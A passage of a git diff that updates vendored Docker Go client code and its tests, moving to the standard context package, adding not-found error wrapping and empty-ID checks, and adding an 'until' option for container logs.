+func (cli *Client) ContainerExecAttach(ctx context.Context, execID string, config types.ExecStartCheck) (types.HijackedResponse, error) { headers := map[string][]string{"Content-Type": {"application/json"}} return cli.postHijacked(ctx, "/exec/"+execID+"/start", nil, config, headers) } diff --git a/vendor/github.com/docker/docker/client/container_exec_test.go b/vendor/github.com/docker/docker/client/container_exec_test.go index 0e296a50ad..68b900bf14 100644 --- a/vendor/github.com/docker/docker/client/container_exec_test.go +++ b/vendor/github.com/docker/docker/client/container_exec_test.go @@ -1,7 +1,8 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "encoding/json" "fmt" "io/ioutil" @@ -9,8 +10,6 @@ import ( "strings" "testing" - "golang.org/x/net/context" - "github.com/docker/docker/api/types" ) diff --git a/vendor/github.com/docker/docker/client/container_export.go b/vendor/github.com/docker/docker/client/container_export.go index 52194f3d34..d0c0a5cbad 100644 --- a/vendor/github.com/docker/docker/client/container_export.go +++ b/vendor/github.com/docker/docker/client/container_export.go @@ -1,10 +1,9 @@ -package client +package client // import "github.com/docker/docker/client" import ( + "context" "io" "net/url" - - "golang.org/x/net/context" ) // ContainerExport retrieves the raw contents of a container diff --git a/vendor/github.com/docker/docker/client/container_export_test.go b/vendor/github.com/docker/docker/client/container_export_test.go index 5849fe9252..8f6c8dce64 100644 --- a/vendor/github.com/docker/docker/client/container_export_test.go +++ b/vendor/github.com/docker/docker/client/container_export_test.go @@ -1,14 +1,13 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "fmt" "io/ioutil" "net/http" "strings" "testing" - - "golang.org/x/net/context" ) func TestContainerExportError(t *testing.T) { diff --git a/vendor/github.com/docker/docker/client/container_inspect.go b/vendor/github.com/docker/docker/client/container_inspect.go index 17f1809747..f453064cf8 100644 --- a/vendor/github.com/docker/docker/client/container_inspect.go +++ b/vendor/github.com/docker/docker/client/container_inspect.go @@ -1,24 +1,23 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "encoding/json" "io/ioutil" - "net/http" "net/url" "github.com/docker/docker/api/types" - "golang.org/x/net/context" ) // ContainerInspect returns the container information. func (cli *Client) ContainerInspect(ctx context.Context, containerID string) (types.ContainerJSON, error) { + if containerID == "" { + return types.ContainerJSON{}, objectNotFoundError{object: "container", id: containerID} + } serverResp, err := cli.get(ctx, "/containers/"+containerID+"/json", nil, nil) if err != nil { - if serverResp.statusCode == http.StatusNotFound { - return types.ContainerJSON{}, containerNotFoundError{containerID} - } - return types.ContainerJSON{}, err + return types.ContainerJSON{}, wrapResponseError(err, serverResp, "container", containerID) } var response types.ContainerJSON @@ -29,16 +28,16 @@ func (cli *Client) ContainerInspect(ctx context.Context, containerID string) (ty // ContainerInspectWithRaw returns the container information and its raw representation. func (cli *Client) ContainerInspectWithRaw(ctx context.Context, containerID string, getSize bool) (types.ContainerJSON, []byte, error) { + if containerID == "" { + return types.ContainerJSON{}, nil, objectNotFoundError{object: "container", id: containerID} + } query := url.Values{} if getSize { query.Set("size", "1") } serverResp, err := cli.get(ctx, "/containers/"+containerID+"/json", query, nil) if err != nil { - if serverResp.statusCode == http.StatusNotFound { - return types.ContainerJSON{}, nil, containerNotFoundError{containerID} - } - return types.ContainerJSON{}, nil, err + return types.ContainerJSON{}, nil, wrapResponseError(err, serverResp, "container", containerID) } defer ensureReaderClosed(serverResp) diff --git a/vendor/github.com/docker/docker/client/container_inspect_test.go b/vendor/github.com/docker/docker/client/container_inspect_test.go index f1a6f4ac7d..92a77f6aea 100644 --- a/vendor/github.com/docker/docker/client/container_inspect_test.go +++ b/vendor/github.com/docker/docker/client/container_inspect_test.go @@ -1,7 +1,8 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "encoding/json" "fmt" "io/ioutil" @@ -10,7 +11,7 @@ import ( "testing" "github.com/docker/docker/api/types" - "golang.org/x/net/context" + "github.com/pkg/errors" ) func TestContainerInspectError(t *testing.T) { @@ -30,11 +31,23 @@ func TestContainerInspectContainerNotFound(t *testing.T) { } _, err := client.ContainerInspect(context.Background(), "unknown") - if err == nil || !IsErrContainerNotFound(err) { + if err == nil || !IsErrNotFound(err) { t.Fatalf("expected a containerNotFound error, got %v", err) } } +func TestContainerInspectWithEmptyID(t *testing.T) { + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + return nil, errors.New("should not make request") + }), + } + _, _, err := client.ContainerInspectWithRaw(context.Background(), "", true) + if !IsErrNotFound(err) { + t.Fatalf("Expected NotFoundError, got %v", err) + } +} + func TestContainerInspect(t *testing.T) { expectedURL := "/containers/container_id/json" client := &Client{ @@ -67,10 +80,10 @@ func TestContainerInspect(t *testing.T) { t.Fatalf("expected `container_id`, got %s", r.ID) } if r.Image != "image" { - t.Fatalf("expected `image`, got %s", r.ID) + t.Fatalf("expected `image`, got %s", r.Image) } if r.Name != "name" { - t.Fatalf("expected `name`, got %s", r.ID) + t.Fatalf("expected `name`, got %s", r.Name) } } @@ -107,10 +120,10 @@ func TestContainerInspectNode(t *testing.T) { t.Fatalf("expected `container_id`, got %s", r.ID) } if r.Image != "image" { - t.Fatalf("expected `image`, got %s", r.ID) + t.Fatalf("expected `image`, got %s", r.Image) } if r.Name != "name" { - t.Fatalf("expected `name`, got %s", r.ID) + t.Fatalf("expected `name`, got %s", r.Name) } if r.Node.ID != "container_node_id" { t.Fatalf("expected `container_node_id`, got %s", r.Node.ID) diff --git a/vendor/github.com/docker/docker/client/container_kill.go b/vendor/github.com/docker/docker/client/container_kill.go index 29f80c73ad..4d6f1d23da 100644 --- a/vendor/github.com/docker/docker/client/container_kill.go +++ b/vendor/github.com/docker/docker/client/container_kill.go @@ -1,9 +1,8 @@ -package client +package client // import "github.com/docker/docker/client" import ( + "context" "net/url" - - "golang.org/x/net/context" ) // ContainerKill terminates the container process but does not remove the container from the docker host. diff --git a/vendor/github.com/docker/docker/client/container_kill_test.go b/vendor/github.com/docker/docker/client/container_kill_test.go index 9477b0abd2..85bb5ee559 100644 --- a/vendor/github.com/docker/docker/client/container_kill_test.go +++ b/vendor/github.com/docker/docker/client/container_kill_test.go @@ -1,14 +1,13 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "fmt" "io/ioutil" "net/http" "strings" "testing" - - "golang.org/x/net/context" ) func TestContainerKillError(t *testing.T) { diff --git a/vendor/github.com/docker/docker/client/container_list.go b/vendor/github.com/docker/docker/client/container_list.go index 4398912197..9c218e2218 100644 --- a/vendor/github.com/docker/docker/client/container_list.go +++ b/vendor/github.com/docker/docker/client/container_list.go @@ -1,13 +1,13 @@ -package client +package client // import "github.com/docker/docker/client" import ( + "context" "encoding/json" "net/url" "strconv" "github.com/docker/docker/api/types" "github.com/docker/docker/api/types/filters" - "golang.org/x/net/context" ) // ContainerList returns the list of containers in the docker host. diff --git a/vendor/github.com/docker/docker/client/container_list_test.go b/vendor/github.com/docker/docker/client/container_list_test.go index e41c6874b5..809f20f5c7 100644 --- a/vendor/github.com/docker/docker/client/container_list_test.go +++ b/vendor/github.com/docker/docker/client/container_list_test.go @@ -1,7 +1,8 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "encoding/json" "fmt" "io/ioutil" @@ -11,7 +12,6 @@ import ( "github.com/docker/docker/api/types" "github.com/docker/docker/api/types/filters" - "golang.org/x/net/context" ) func TestContainerListError(t *testing.T) { diff --git a/vendor/github.com/docker/docker/client/container_logs.go b/vendor/github.com/docker/docker/client/container_logs.go index 69056b6321..5b6541f035 100644 --- a/vendor/github.com/docker/docker/client/container_logs.go +++ b/vendor/github.com/docker/docker/client/container_logs.go @@ -1,18 +1,38 @@ -package client +package client // import "github.com/docker/docker/client" import ( + "context" "io" "net/url" "time" - "golang.org/x/net/context" - "github.com/docker/docker/api/types" timetypes "github.com/docker/docker/api/types/time" + "github.com/pkg/errors" ) // ContainerLogs returns the logs generated by a container in an io.ReadCloser. // It's up to the caller to close the stream. +// +// The stream format on the response will be in one of two formats: +// +// If the container is using a TTY, there is only a single stream (stdout), and +// data is copied directly from the container output stream, no extra +// multiplexing or headers. +// +// If the container is *not* using a TTY, streams for stdout and stderr are +// multiplexed. +// The format of the multiplexed stream is as follows: +// +// [8]byte{STREAM_TYPE, 0, 0, 0, SIZE1, SIZE2, SIZE3, SIZE4}[]byte{OUTPUT} +// +// STREAM_TYPE can be 1 for stdout and 2 for stderr +// +// SIZE1, SIZE2, SIZE3, and SIZE4 are four bytes of uint32 encoded as big endian. +// This is the size of OUTPUT. +// +// You can use github.com/docker/docker/pkg/stdcopy.StdCopy to demultiplex this +// stream. func (cli *Client) ContainerLogs(ctx context.Context, container string, options types.ContainerLogsOptions) (io.ReadCloser, error) { query := url.Values{} if options.ShowStdout { @@ -26,11 +46,19 @@ func (cli *Client) ContainerLogs(ctx context.Context, container string, options if options.Since != "" { ts, err := timetypes.GetTimestamp(options.Since, time.Now()) if err != nil { - return nil, err + return nil, errors.Wrap(err, `invalid value for "since"`) } query.Set("since", ts) } + if options.Until != "" { + ts, err := timetypes.GetTimestamp(options.Until, time.Now()) + if err != nil { + return nil, errors.Wrap(err, `invalid value for "until"`) + } + query.Set("until", ts) + } + if options.Timestamps { query.Set("timestamps", "1") } @@ -46,7 +74,7 @@ func (cli *Client) ContainerLogs(ctx context.Context, container string, options resp, err := cli.get(ctx, "/containers/"+container+"/logs", query, nil) if err != nil { - return nil, err + return nil, wrapResponseError(err, resp, "container", container) } return resp.body, nil } diff --git a/vendor/github.com/docker/docker/client/container_logs_test.go b/vendor/github.com/docker/docker/client/container_logs_test.go index 99e31842c9..6d6e34e101 100644 --- a/vendor/github.com/docker/docker/client/container_logs_test.go +++ b/vendor/github.com/docker/docker/client/container_logs_test.go @@ -1,7 +1,8 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "fmt" "io" "io/ioutil" @@ -13,24 +14,34 @@ import ( "time" "github.com/docker/docker/api/types" - - "golang.org/x/net/context" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" ) +func TestContainerLogsNotFoundError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusNotFound, "Not found")), + } + _, err := client.ContainerLogs(context.Background(), "container_id", types.ContainerLogsOptions{}) + if !IsErrNotFound(err) { + t.Fatalf("expected a not found error, got %v", err) + } +} + func TestContainerLogsError(t *testing.T) { client := &Client{ client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), } _, err := client.ContainerLogs(context.Background(), "container_id", types.ContainerLogsOptions{}) - if err == nil || err.Error() != "Error response from daemon: Server error" { - t.Fatalf("expected a Server Error, got %v", err) - } + assert.Check(t, is.Error(err, "Error response from daemon: Server error")) _, err = client.ContainerLogs(context.Background(), "container_id", types.ContainerLogsOptions{ Since: "2006-01-02TZ", }) - if err == nil || !strings.Contains(err.Error(), `parsing time "2006-01-02TZ"`) { - t.Fatalf("expected a 'parsing time' error, got %v", err) - } + assert.Check(t, is.ErrorContains(err, `parsing time "2006-01-02TZ"`)) + _, err = client.ContainerLogs(context.Background(), "container_id", types.ContainerLogsOptions{ + Until: "2006-01-02TZ", + }) + assert.Check(t, is.ErrorContains(err, `parsing time "2006-01-02TZ"`)) } func TestContainerLogs(t *testing.T) { @@ -38,6 +49,7 @@ func TestContainerLogs(t *testing.T) { cases := []struct { options types.ContainerLogsOptions expectedQueryParams map[string]string + expectedError string }{ { expectedQueryParams: map[string]string{ @@ -71,21 +83,44 @@ func TestContainerLogs(t *testing.T) { }, { options: types.ContainerLogsOptions{ - // An complete invalid date, timestamp or go duration will be - // passed as is - Since: "invalid but valid", + // timestamp will be passed as is + Since: "1136073600.000000001", + }, + expectedQueryParams: map[string]string{ + "tail": "", + "since": "1136073600.000000001", + }, + }, + { + options: types.ContainerLogsOptions{ + // timestamp will be passed as is + Until: "1136073600.000000001", }, expectedQueryParams: map[string]string{ "tail": "", - "since": "invalid but valid", + "until": "1136073600.000000001", + }, + }, + { + options: types.ContainerLogsOptions{ + // An complete invalid date will not be passed + Since: "invalid value", }, + expectedError: `invalid value for "since": failed to parse value as time or duration: "invalid value"`, + }, + { + options: types.ContainerLogsOptions{ + // An complete invalid date will not be passed + Until: "invalid value", + }, + expectedError: `invalid value for "until": failed to parse value as time or duration: "invalid value"`, }, } for _, logCase := range cases { client := &Client{ client: newMockClient(func(r *http.Request) (*http.Response, error) { if !strings.HasPrefix(r.URL.Path, expectedURL) { - return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, r.URL) + return nil, fmt.Errorf("expected URL '%s', got '%s'", expectedURL, r.URL) } // Check query parameters query := r.URL.Query() @@ -102,17 +137,15 @@ func TestContainerLogs(t *testing.T) { }), } body, err := client.ContainerLogs(context.Background(), "container_id", logCase.options) - if err != nil { - t.Fatal(err) + if logCase.expectedError != "" { + assert.Check(t, is.Error(err, logCase.expectedError)) + continue } + assert.NilError(t, err) defer body.Close() content, err := ioutil.ReadAll(body) - if err != nil { - t.Fatal(err) - } - if string(content) != "response" { - t.Fatalf("expected response to contain 'response', got %s", string(content)) - } + assert.NilError(t, err) + assert.Check(t, is.Contains(string(content), "response")) } } diff --git a/vendor/github.com/docker/docker/client/container_pause.go b/vendor/github.com/docker/docker/client/container_pause.go index 412067a782..5e7271a371 100644 --- a/vendor/github.com/docker/docker/client/container_pause.go +++ b/vendor/github.com/docker/docker/client/container_pause.go @@ -1,6 +1,6 @@ -package client +package client // import "github.com/docker/docker/client" -import "golang.org/x/net/context" +import "context" // ContainerPause pauses the main process of a given container without terminating it. func (cli *Client) ContainerPause(ctx context.Context, containerID string) error { diff --git a/vendor/github.com/docker/docker/client/container_pause_test.go b/vendor/github.com/docker/docker/client/container_pause_test.go index 0ee2f05d7e..d1f73a67f3 100644 --- a/vendor/github.com/docker/docker/client/container_pause_test.go +++ b/vendor/github.com/docker/docker/client/container_pause_test.go @@ -1,14 +1,13 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "fmt" "io/ioutil" "net/http" "strings" "testing" - - "golang.org/x/net/context" ) func TestContainerPauseError(t *testing.T) { diff --git a/vendor/github.com/docker/docker/client/container_prune.go b/vendor/github.com/docker/docker/client/container_prune.go index b582170867..14f88d93ba 100644 --- a/vendor/github.com/docker/docker/client/container_prune.go +++ b/vendor/github.com/docker/docker/client/container_prune.go @@ -1,12 +1,12 @@ -package client +package client // import "github.com/docker/docker/client" import ( + "context" "encoding/json" "fmt" "github.com/docker/docker/api/types" "github.com/docker/docker/api/types/filters" - "golang.org/x/net/context" ) // ContainersPrune requests the daemon to delete unused data diff --git a/vendor/github.com/docker/docker/client/container_prune_test.go b/vendor/github.com/docker/docker/client/container_prune_test.go new file mode 100644 index 0000000000..6a830d01dc --- /dev/null +++ b/vendor/github.com/docker/docker/client/container_prune_test.go @@ -0,0 +1,125 @@ +package client // import "github.com/docker/docker/client" + +import ( + "bytes" + "context" + "encoding/json" + "fmt" + "io/ioutil" + "net/http" + "strings" + "testing" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/filters" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" +) + +func TestContainersPruneError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + version: "1.25", + } + + filters := filters.NewArgs() + + _, err := client.ContainersPrune(context.Background(), filters) + assert.Check(t, is.Error(err, "Error response from daemon: Server error")) +} + +func TestContainersPrune(t *testing.T) { + expectedURL := "/v1.25/containers/prune" + + danglingFilters := filters.NewArgs() + danglingFilters.Add("dangling", "true") + + noDanglingFilters := filters.NewArgs() + noDanglingFilters.Add("dangling", "false") + + danglingUntilFilters := filters.NewArgs() + danglingUntilFilters.Add("dangling", "true") + danglingUntilFilters.Add("until", "2016-12-15T14:00") + + labelFilters := filters.NewArgs() + labelFilters.Add("dangling", "true") + labelFilters.Add("label", "label1=foo") + labelFilters.Add("label", "label2!=bar") + + listCases := []struct { + filters filters.Args + expectedQueryParams map[string]string + }{ + { + filters: filters.Args{}, + expectedQueryParams: map[string]string{ + "until": "", + "filter": "", + "filters": "", + }, + }, + { + filters: danglingFilters, + expectedQueryParams: map[string]string{ + "until": "", + "filter": "", + "filters": `{"dangling":{"true":true}}`, + }, + }, + { + filters: danglingUntilFilters, + expectedQueryParams: map[string]string{ + "until": "", + "filter": "", + "filters": `{"dangling":{"true":true},"until":{"2016-12-15T14:00":true}}`, + }, + }, + { + filters: noDanglingFilters, + expectedQueryParams: map[string]string{ + "until": "", + "filter": "", + "filters": `{"dangling":{"false":true}}`, + }, + }, + { + filters: labelFilters, + expectedQueryParams: map[string]string{ + "until": "", + "filter": "", + "filters": `{"dangling":{"true":true},"label":{"label1=foo":true,"label2!=bar":true}}`, + }, + }, + } + for _, listCase := range listCases { + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + query := req.URL.Query() + for key, expected := range listCase.expectedQueryParams { + actual := query.Get(key) + assert.Check(t, is.Equal(expected, actual)) + } + content, err := json.Marshal(types.ContainersPruneReport{ + ContainersDeleted: []string{"container_id1", "container_id2"}, + SpaceReclaimed: 9999, + }) + if err != nil { + return nil, err + } + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader(content)), + }, nil + }), + version: "1.25", + } + + report, err := client.ContainersPrune(context.Background(), listCase.filters) + assert.Check(t, err) + assert.Check(t, is.Len(report.ContainersDeleted, 2)) + assert.Check(t, is.Equal(uint64(9999), report.SpaceReclaimed)) + } +} diff --git a/vendor/github.com/docker/docker/client/container_remove.go b/vendor/github.com/docker/docker/client/container_remove.go index 3a79590ced..ab4cfc16f8 100644 --- a/vendor/github.com/docker/docker/client/container_remove.go +++ b/vendor/github.com/docker/docker/client/container_remove.go @@ -1,10 +1,10 @@ -package client +package client // import "github.com/docker/docker/client" import ( + "context" "net/url" "github.com/docker/docker/api/types" - "golang.org/x/net/context" ) // ContainerRemove kills and removes a container from the docker host. @@ -23,5 +23,5 @@ func (cli *Client) ContainerRemove(ctx context.Context, containerID string, opti resp, err := cli.delete(ctx, "/containers/"+containerID, query, nil) ensureReaderClosed(resp) - return err + return wrapResponseError(err, resp, "container", containerID) } diff --git a/vendor/github.com/docker/docker/client/container_remove_test.go b/vendor/github.com/docker/docker/client/container_remove_test.go index 798c08b333..d94d831304 100644 --- a/vendor/github.com/docker/docker/client/container_remove_test.go +++ b/vendor/github.com/docker/docker/client/container_remove_test.go @@ -1,7 +1,8 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "fmt" "io/ioutil" "net/http" @@ -9,7 +10,8 @@ import ( "testing" "github.com/docker/docker/api/types" - "golang.org/x/net/context" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" ) func TestContainerRemoveError(t *testing.T) { @@ -17,9 +19,16 @@ func TestContainerRemoveError(t *testing.T) { client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), } err := client.ContainerRemove(context.Background(), "container_id", types.ContainerRemoveOptions{}) - if err == nil || err.Error() != "Error response from daemon: Server error" { - t.Fatalf("expected a Server Error, got %v", err) + assert.Check(t, is.Error(err, "Error response from daemon: Server error")) +} + +func TestContainerRemoveNotFoundError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusNotFound, "missing")), } + err := client.ContainerRemove(context.Background(), "container_id", types.ContainerRemoveOptions{}) + assert.Check(t, is.Error(err, "Error: No such container: container_id")) + assert.Check(t, IsErrNotFound(err)) } func TestContainerRemove(t *testing.T) { @@ -53,7 +62,5 @@ func TestContainerRemove(t *testing.T) { RemoveVolumes: true, Force: true, }) - if err != nil { - t.Fatal(err) - } + assert.Check(t, err) } diff --git a/vendor/github.com/docker/docker/client/container_rename.go b/vendor/github.com/docker/docker/client/container_rename.go index 0e718da7c6..240fdf552b 100644 --- a/vendor/github.com/docker/docker/client/container_rename.go +++ b/vendor/github.com/docker/docker/client/container_rename.go @@ -1,9 +1,8 @@ -package client +package client // import "github.com/docker/docker/client" import ( + "context" "net/url" - - "golang.org/x/net/context" ) // ContainerRename changes the name of a given container. diff --git a/vendor/github.com/docker/docker/client/container_rename_test.go b/vendor/github.com/docker/docker/client/container_rename_test.go index 732ebff5f7..42be609028 100644 --- a/vendor/github.com/docker/docker/client/container_rename_test.go +++ b/vendor/github.com/docker/docker/client/container_rename_test.go @@ -1,14 +1,13 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "fmt" "io/ioutil" "net/http" "strings" "testing" - - "golang.org/x/net/context" ) func TestContainerRenameError(t *testing.T) { diff --git a/vendor/github.com/docker/docker/client/container_resize.go b/vendor/github.com/docker/docker/client/container_resize.go index 66c3cc1940..a9d4c0c79a 100644 --- a/vendor/github.com/docker/docker/client/container_resize.go +++ b/vendor/github.com/docker/docker/client/container_resize.go @@ -1,11 +1,11 @@ -package client +package client // import "github.com/docker/docker/client" import ( + "context" "net/url" "strconv" "github.com/docker/docker/api/types" - "golang.org/x/net/context" ) // ContainerResize changes the size of the tty for a container. diff --git a/vendor/github.com/docker/docker/client/container_resize_test.go b/vendor/github.com/docker/docker/client/container_resize_test.go index 5b2efecdce..3c10fd7e69 100644 --- a/vendor/github.com/docker/docker/client/container_resize_test.go +++ b/vendor/github.com/docker/docker/client/container_resize_test.go @@ -1,7 +1,8 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "fmt" "io/ioutil" "net/http" @@ -9,7 +10,6 @@ import ( "testing" "github.com/docker/docker/api/types" - "golang.org/x/net/context" ) func TestContainerResizeError(t *testing.T) { diff --git a/vendor/github.com/docker/docker/client/container_restart.go b/vendor/github.com/docker/docker/client/container_restart.go index 74d7455f02..41e421969f 100644 --- a/vendor/github.com/docker/docker/client/container_restart.go +++ b/vendor/github.com/docker/docker/client/container_restart.go @@ -1,11 +1,11 @@ -package client +package client // import "github.com/docker/docker/client" import ( + "context" "net/url" "time" timetypes "github.com/docker/docker/api/types/time" - "golang.org/x/net/context" ) // ContainerRestart stops and starts a container again. diff --git a/vendor/github.com/docker/docker/client/container_restart_test.go b/vendor/github.com/docker/docker/client/container_restart_test.go index 8c3cfd6a6f..27e81da5d8 100644 --- a/vendor/github.com/docker/docker/client/container_restart_test.go +++ b/vendor/github.com/docker/docker/client/container_restart_test.go @@ -1,15 +1,14 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "fmt" "io/ioutil" "net/http" "strings" "testing" "time" - - "golang.org/x/net/context" ) func TestContainerRestartError(t *testing.T) { diff --git a/vendor/github.com/docker/docker/client/container_start.go b/vendor/github.com/docker/docker/client/container_start.go index b1f08de416..c2e0b15dca 100644 --- a/vendor/github.com/docker/docker/client/container_start.go +++ b/vendor/github.com/docker/docker/client/container_start.go @@ -1,10 +1,9 @@ -package client +package client // import "github.com/docker/docker/client" import ( + "context" "net/url" - "golang.org/x/net/context" - "github.com/docker/docker/api/types" ) diff --git a/vendor/github.com/docker/docker/client/container_start_test.go b/vendor/github.com/docker/docker/client/container_start_test.go index 5826fa8bc7..277c585caa 100644 --- a/vendor/github.com/docker/docker/client/container_start_test.go +++ b/vendor/github.com/docker/docker/client/container_start_test.go @@ -1,7 +1,8 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "encoding/json" "fmt" "io/ioutil" @@ -9,8 +10,6 @@ import ( "strings" "testing" - "golang.org/x/net/context" - "github.com/docker/docker/api/types" ) diff --git a/vendor/github.com/docker/docker/client/container_stats.go b/vendor/github.com/docker/docker/client/container_stats.go index 4758c66e32..6ef44c7748 100644 --- a/vendor/github.com/docker/docker/client/container_stats.go +++ b/vendor/github.com/docker/docker/client/container_stats.go @@ -1,10 +1,10 @@ -package client +package client // import "github.com/docker/docker/client" import ( + "context" "net/url" "github.com/docker/docker/api/types" - "golang.org/x/net/context" ) // ContainerStats returns near realtime stats for a given container. diff --git a/vendor/github.com/docker/docker/client/container_stats_test.go b/vendor/github.com/docker/docker/client/container_stats_test.go index 7414f135c3..d88596315c 100644 --- a/vendor/github.com/docker/docker/client/container_stats_test.go +++ b/vendor/github.com/docker/docker/client/container_stats_test.go @@ -1,14 +1,13 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "fmt" "io/ioutil" "net/http" "strings" "testing" - - "golang.org/x/net/context" ) func TestContainerStatsError(t *testing.T) { diff --git a/vendor/github.com/docker/docker/client/container_stop.go b/vendor/github.com/docker/docker/client/container_stop.go index b5418ae8c8..629d7ab64c 100644 --- a/vendor/github.com/docker/docker/client/container_stop.go +++ b/vendor/github.com/docker/docker/client/container_stop.go @@ -1,15 +1,20 @@ -package client +package client // import "github.com/docker/docker/client" import ( + "context" "net/url" "time" timetypes "github.com/docker/docker/api/types/time" - "golang.org/x/net/context" ) -// ContainerStop stops a container without terminating the process. -// The process is blocked until the container stops or the timeout expires. +// ContainerStop stops a container. In case the container fails to stop +// gracefully within a time frame specified by the timeout argument, +// it is forcefully terminated (killed). +// +// If the timeout is nil, the container's StopTimeout value is used, if set, +// otherwise the engine default. A negative timeout value can be specified, +// meaning no timeout, i.e. no forceful termination is performed. func (cli *Client) ContainerStop(ctx context.Context, containerID string, timeout *time.Duration) error { query := url.Values{} if timeout != nil { diff --git a/vendor/github.com/docker/docker/client/container_stop_test.go b/vendor/github.com/docker/docker/client/container_stop_test.go index c32cd691c4..e9af74525a 100644 --- a/vendor/github.com/docker/docker/client/container_stop_test.go +++ b/vendor/github.com/docker/docker/client/container_stop_test.go @@ -1,15 +1,14 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "fmt" "io/ioutil" "net/http" "strings" "testing" "time" - - "golang.org/x/net/context" ) func TestContainerStopError(t *testing.T) { diff --git a/vendor/github.com/docker/docker/client/container_top.go b/vendor/github.com/docker/docker/client/container_top.go index 4e7270ea22..9c9fce7a04 100644 --- a/vendor/github.com/docker/docker/client/container_top.go +++ b/vendor/github.com/docker/docker/client/container_top.go @@ -1,17 +1,17 @@ -package client +package client // import "github.com/docker/docker/client" import ( + "context" "encoding/json" "net/url" "strings" - "github.com/docker/docker/api/types" - "golang.org/x/net/context" + "github.com/docker/docker/api/types/container" ) // ContainerTop shows process information from within a container. -func (cli *Client) ContainerTop(ctx context.Context, containerID string, arguments []string) (types.ContainerProcessList, error) { - var response types.ContainerProcessList +func (cli *Client) ContainerTop(ctx context.Context, containerID string, arguments []string) (container.ContainerTopOKBody, error) { + var response container.ContainerTopOKBody query := url.Values{} if len(arguments) > 0 { query.Set("ps_args", strings.Join(arguments, " ")) diff --git a/vendor/github.com/docker/docker/client/container_top_test.go b/vendor/github.com/docker/docker/client/container_top_test.go index 7802be063e..48daba7783 100644 --- a/vendor/github.com/docker/docker/client/container_top_test.go +++ b/vendor/github.com/docker/docker/client/container_top_test.go @@ -1,7 +1,8 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "encoding/json" "fmt" "io/ioutil" @@ -10,8 +11,7 @@ import ( "strings" "testing" - "github.com/docker/docker/api/types" - "golang.org/x/net/context" + "github.com/docker/docker/api/types/container" ) func TestContainerTopError(t *testing.T) { @@ -43,7 +43,7 @@ func TestContainerTop(t *testing.T) { return nil, fmt.Errorf("args not set in URL query properly. Expected 'arg1 arg2', got %v", args) } - b, err := json.Marshal(types.ContainerProcessList{ + b, err := json.Marshal(container.ContainerTopOKBody{ Processes: [][]string{ {"p1", "p2"}, {"p3"}, diff --git a/vendor/github.com/docker/docker/client/container_unpause.go b/vendor/github.com/docker/docker/client/container_unpause.go index 5c76211256..1d8f873169 100644 --- a/vendor/github.com/docker/docker/client/container_unpause.go +++ b/vendor/github.com/docker/docker/client/container_unpause.go @@ -1,6 +1,6 @@ -package client +package client // import "github.com/docker/docker/client" -import "golang.org/x/net/context" +import "context" // ContainerUnpause resumes the process execution within a container func (cli *Client) ContainerUnpause(ctx context.Context, containerID string) error { diff --git a/vendor/github.com/docker/docker/client/container_unpause_test.go b/vendor/github.com/docker/docker/client/container_unpause_test.go index 2c42727191..000699190a 100644 --- a/vendor/github.com/docker/docker/client/container_unpause_test.go +++ b/vendor/github.com/docker/docker/client/container_unpause_test.go @@ -1,14 +1,13 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "fmt" "io/ioutil" "net/http" "strings" "testing" - - "golang.org/x/net/context" ) func TestContainerUnpauseError(t *testing.T) { diff --git a/vendor/github.com/docker/docker/client/container_update.go b/vendor/github.com/docker/docker/client/container_update.go index 5082f22dfa..14e7f23dfb 100644 --- a/vendor/github.com/docker/docker/client/container_update.go +++ b/vendor/github.com/docker/docker/client/container_update.go @@ -1,10 +1,10 @@ -package client +package client // import "github.com/docker/docker/client" import ( + "context" "encoding/json" "github.com/docker/docker/api/types/container" - "golang.org/x/net/context" ) // ContainerUpdate updates resources of a container diff --git a/vendor/github.com/docker/docker/client/container_update_test.go b/vendor/github.com/docker/docker/client/container_update_test.go index 715bb7ca23..41c6485ec8 100644 --- a/vendor/github.com/docker/docker/client/container_update_test.go +++ b/vendor/github.com/docker/docker/client/container_update_test.go @@ -1,7 +1,8 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "encoding/json" "fmt" "io/ioutil" @@ -10,7 +11,6 @@ import ( "testing" "github.com/docker/docker/api/types/container" - "golang.org/x/net/context" ) func TestContainerUpdateError(t *testing.T) { diff --git a/vendor/github.com/docker/docker/client/container_wait.go b/vendor/github.com/docker/docker/client/container_wait.go index 93212c70ee..6ab8c1da96 100644 --- a/vendor/github.com/docker/docker/client/container_wait.go +++ b/vendor/github.com/docker/docker/client/container_wait.go @@ -1,26 +1,83 @@ -package client +package client // import 